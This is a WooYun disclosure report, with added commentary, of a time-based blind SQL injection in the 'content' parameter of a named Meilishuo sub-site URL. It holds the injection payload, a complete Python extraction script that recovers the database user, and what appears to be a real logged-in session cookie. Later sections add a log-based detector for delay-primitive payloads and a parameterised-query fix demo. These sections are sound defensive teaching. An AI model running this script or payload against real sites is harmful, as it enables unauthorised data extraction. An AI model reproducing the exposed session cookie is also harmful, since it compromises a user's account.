WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2016-03-21: Details have been sent to the vendor and are awaiting the vendor's handling
2016-03-22: The vendor has confirmed; details are disclosed only to the vendor
2016-04-01: Details disclosed to core white hats and experts in the relevant field
2016-04-11: Details disclosed to ordinary white hats
2016-04-21: Details disclosed to intern white hats
2016-05-06: Details disclosed to the public
Time-based blind SQL injection on a Meilishuo sub-site
Affected site: http://lm.meilishuo.com/union/pro_manage/?sort=0&catalog=0&type=1&content=%E6%97%B6%E5%B0%9A%E8%BF%90%E5%8A%A8%E5%B0%8F%E7%99%BD%E9%9E%8B
The content parameter is injectable. Payload:
' AND (if (1=1,sleep(5),1)) AND 'fuck'='fuck
A quick script to extract data through the blind injection:
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Python 2 script (urllib2, print statement). The shebang in the report read "env/python",
# which is a typo and is corrected here.
__author__ = 'BlackYe.'

import urllib
import urllib2
import time, sys

user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36"
# Logged-in session cookie exactly as posted in the report
cookie = '''SEASHELL=CggNLVbq0albM21uBLUOAg==; PHPSESSID=b1n7el3d5pbgee9codgvkh9ti3; shop_unlogin_gray_preview=2806; nsessid=gMRlXeLKuomzPrtu0zswg7Oi; _pzfxuvpc=1458230279892%7C6143346960133899759%7C1%7C1458230279897%7C1%7C%7C1122013430142212671; Hm_lvt_91f81dadcff336ae93c874de253c61ff=1458230057; Hm_lpvt_91f81dadcff336ae93c874de253c61ff=1458230397; MEILISHUO_REFER=default; santorini_mm=e0405ff84180864a6fc7cbe2b650fd44; CHANNEL_FROM=0; _ga=GA1.2.1052119354.1458230096; query_param_r=welcome-main%3A_page_code%3Dwelcome-main.2_mapp-myCenter; r_mark=welcome-main%3A_page_code%3Dwelcome-main.2_mapp-myCenter; MEILISHUO_MM=688d2bd78c48fadad4ec245ed8b9568d; pgv_pvi=6804349952; pgv_si=s9015797760; numInCart=0; MEILISHUO_GLOBAL_KEY=05e675f4bfa391113160317234814904; Hm_lvt_dde72e241ea4e39b97eca9a01eea2dda=1458230625; Hm_lpvt_dde72e241ea4e39b97eca9a01eea2dda=1458462341; MEILISHUO_RZ=1549874950; MLS_S_RZ=1549874950; MEILISHUO_UID_KEY=42451fdebdb8798eae96d0ad6c06722f; LOGON_FROM=; MEILISHUO_UNION_LOGING_USERID=516624981; Hm_lvt_6546c47dcaaac00ad0aff6b94ebe9213=1458230207; Hm_lpvt_6546c47dcaaac00ad0aff6b94ebe9213=1458552096 '''


class TimeBaseInject(object):
    def __init__(self, url):
        self.url = url
        self.result = ''
        self.payload_time = 3   # seconds the injected sleep() lasts when a guess is right

    def run(self):
        # Recover user() one character position at a time
        ipos = 1
        while True:
            s = self.match(ipos)
            if s is None:
                # No character in 0..126 produced a delay (guard added; the original
                # would have crashed on chr(None) here)
                break
            result_chr = chr(s)
            # substr() past the end of user() returns '', which MySQL's default PAD SPACE
            # collations compare equal to ' ', so a "match" on chr(32) marks the end of the string
            if result_chr == chr(32):
                break
            # The comparison is case-insensitive, so the uppercase letter matches first; lower() it
            self.result = self.result + result_chr.lower()
            sys.stdout.write('\r\n\r\n')
            print self.result
            ipos = ipos + 1

    def send_inject(self, target_url):
        # True when the response took at least payload_time seconds, i.e. sleep() ran
        request = urllib2.Request(target_url)
        request.add_header("User-Agent", user_agent)
        request.add_header("Cookie", cookie)
        start_time = time.time()
        try:
            urllib2.urlopen(request).read()
            return self.is_returnok(start_time)
        except Exception, e:
            print str(e)
            return False

    def match(self, ipos):
        # Try every candidate character for position ipos; the first one that delays the
        # response is the right one
        sys.stdout.write("[CrackING]")
        for i in range(0, 127):
            payload = "' AND (if (substr(user(), %d ,1)='%s', sleep(%d), 1)) AND 'fuck'='fuck" % (ipos, chr(i), self.payload_time)
            #print payload
            sys.stdout.write(".")
            sys.stdout.flush()
            target_url = self.url + urllib.quote(payload)
            if self.send_inject(target_url):
                return i
        return None

    def is_returnok(self, start_time):
        return (time.time() - start_time) >= self.payload_time


def main():
    url = 'http://lm.meilishuo.com/union/pro_manage/?sort=0&catalog=0&type=1&content=%E6%97%B6%E5%B0%9A%E8%BF%90%E5%8A%A8%E5%B0%8F%E7%99%BD%E9%9E%8B'
    s = TimeBaseInject(url)
    s.run()


if __name__ == '__main__':
    main()
Current DB user:
[email protected]
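The extraction above leaves a very recognisable trace in the web server's access log: a burst of requests from one source, all carrying a delay primitive (sleep(), benchmark(), pg_sleep(), WAITFOR DELAY) in the same parameter, of which roughly one per extracted character is slow. The following detection routine is an added example and is not part of the report; the log lines, IP addresses and the trailing request-time field (as nginx writes with $request_time) are constructed for it.

```python
import re
import urllib.parse

# Constructed sample log lines (not from the report): combined log format plus a trailing
# request-time field in seconds. The probe requests mirror the report's payload shape.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Mar/2016:10:00:01 +0800] "GET /union/pro_manage/?sort=0&content=%E8%BF%90%E5%8A%A8 HTTP/1.1" 200 5120 0.041
203.0.113.5 - - [21/Mar/2016:10:00:02 +0800] "GET /union/pro_manage/?sort=0&content=%27%20AND%20%28if%20%28substr%28user%28%29%2C%201%20%2C1%29%3D%27a%27%2C%20sleep%283%29%2C%201%29%29%20AND%20%27fuck%27%3D%27fuck HTTP/1.1" 200 5120 0.052
203.0.113.5 - - [21/Mar/2016:10:00:06 +0800] "GET /union/pro_manage/?sort=0&content=%27%20AND%20%28if%20%28substr%28user%28%29%2C%201%20%2C1%29%3D%27b%27%2C%20sleep%283%29%2C%201%29%29%20AND%20%27fuck%27%3D%27fuck HTTP/1.1" 200 5120 3.049
198.51.100.9 - - [21/Mar/2016:10:00:07 +0800] "GET /union/pro_manage/?sort=0&content=sleep+shirt HTTP/1.1" 200 5120 0.039
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<rt>[\d.]+)$'
)

# Delay primitives of the common engines. Requiring the '(' (or the DELAY keyword) keeps
# ordinary search terms such as "sleep shirt" from matching.
DELAY_RE = re.compile(r'\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b', re.IGNORECASE)


def parse_log_line(line):
    """Return the fields of one log line as a dict, or None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec['rt'] = float(rec['rt'])
    return rec


def decoded_params(target):
    """Split the query string and percent-decode each value once (a second pass is only
    needed if the application itself decodes twice)."""
    query = urllib.parse.urlsplit(target).query
    return urllib.parse.parse_qsl(query, keep_blank_values=True)


def find_time_based_sqli(log_text, slow_threshold=2.0):
    """One finding per request whose decoded parameter value carries a delay primitive.
    'slow' marks the requests whose measured time also crossed the threshold, i.e. the
    probes where the injected condition was true."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        for name, value in decoded_params(rec['target']):
            if DELAY_RE.search(value):
                findings.append({
                    'ip': rec['ip'], 'ts': rec['ts'], 'param': name,
                    'value': value, 'slow': rec['rt'] >= slow_threshold,
                })
    return findings


def probes_per_ip(findings):
    """A blind extraction issues up to ~127 probes per character, so request volume per
    source is the second signal next to the payload itself."""
    counts = {}
    for f in findings:
        counts[f['ip']] = counts.get(f['ip'], 0) + 1
    return counts


if __name__ == '__main__':
    hits = find_time_based_sqli(SAMPLE_LOG)
    for h in hits:
        print('%s %s param=%s slow=%s' % (h['ts'], h['ip'], h['param'], h['slow']))
    print(probes_per_ip(hits))
```

On the constructed lines this flags the two probe requests (the second one also as slow) and leaves the genuine "sleep shirt" search alone; in practice the threshold should sit just below the sleep() value the probes use, and the per-IP count is what separates a scanner from a single stray request.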
Filter or escape the input~~~
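Escaping is the weaker of the two fixes; binding the value as a query parameter removes the problem outright because the search string never becomes part of the statement text. The snippet below is an added example, not the site's code: a toy product search with the vulnerable concatenated query beside the parameterised one, run against an in-memory SQLite database. SQLite has no if() or sleep(), so the report's payload is adapted to CASE syntax and a small sleep() stand-in is registered on the connection; both are constructed for this demonstration.

```python
import sqlite3
import time

# Constructed SQLite adaptation of the report's payload (not the report's exact string):
# CASE replaces MySQL's if(), and the trailing 'x' LIKE 'x closes the %' that the search appends.
DELAY_PAYLOAD = "' AND (CASE WHEN 1=1 THEN sleep(1) ELSE 1 END) AND 'x' LIKE 'x"


class ProductSearch(object):
    """Toy catalogue search with the vulnerable and the fixed query side by side."""

    def __init__(self):
        self.conn = sqlite3.connect(':memory:')
        self.sleep_calls = 0
        self.conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
        self.conn.executemany("INSERT INTO products (name) VALUES (?)",
                              [("sports shoes white",), ("sports shoes black",), ("rain coat",)])
        # Stand-in for MySQL sleep(): counts calls and pauses briefly so the delay is measurable
        self.conn.create_function("sleep", 1, self._sleep)

    def _sleep(self, seconds):
        self.sleep_calls += 1
        time.sleep(0.1)   # capped for the demo; MySQL would honour the full value
        return 0          # like MySQL's sleep(), so the injected condition ends up false

    def search_unsafe(self, content):
        # The report's bug class: user input concatenated into the statement. The quote in
        # the input closes the literal and whatever follows is executed as SQL.
        sql = "SELECT id, name FROM products WHERE name LIKE '%" + content + "%'"
        return self.conn.execute(sql).fetchall()

    def search_safe(self, content):
        # Parameter binding: the value travels separately from the statement text, so the
        # quote, AND and sleep() are nothing more than characters of the search string.
        sql = "SELECT id, name FROM products WHERE name LIKE '%' || ? || '%'"
        return self.conn.execute(sql, (content,)).fetchall()

    def timed(self, search, content):
        """Run one of the two searches and return (rows, seconds taken)."""
        start = time.time()
        rows = search(content)
        return rows, time.time() - start


if __name__ == '__main__':
    shop = ProductSearch()
    print(shop.search_safe("shoes"))
    rows, elapsed = shop.timed(shop.search_unsafe, DELAY_PAYLOAD)
    print("unsafe: %d rows, %.2fs, sleep() called %d times" % (len(rows), elapsed, shop.sleep_calls))
    rows, elapsed = shop.timed(shop.search_safe, DELAY_PAYLOAD)
    print("safe:   %d rows, %.2fs, sleep() called %d times" % (len(rows), elapsed, shop.sleep_calls))
```

Both searches return two rows for "shoes"; with the payload, the concatenated query invokes sleep() for every row it scans and takes measurably longer, while the bound query returns no rows, never calls sleep(), and returns at once. The measurable difference is exactly the side channel the script above reads, and binding closes it.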
Severity: High
Vulnerability Rank: 10
Confirmed: 2016-03-22 12:11
Thank you very much for your attention to Meilishuo security. The vulnerability has been verified to exist, and the relevant colleagues have been contacted to fix it. Thanks!
None yet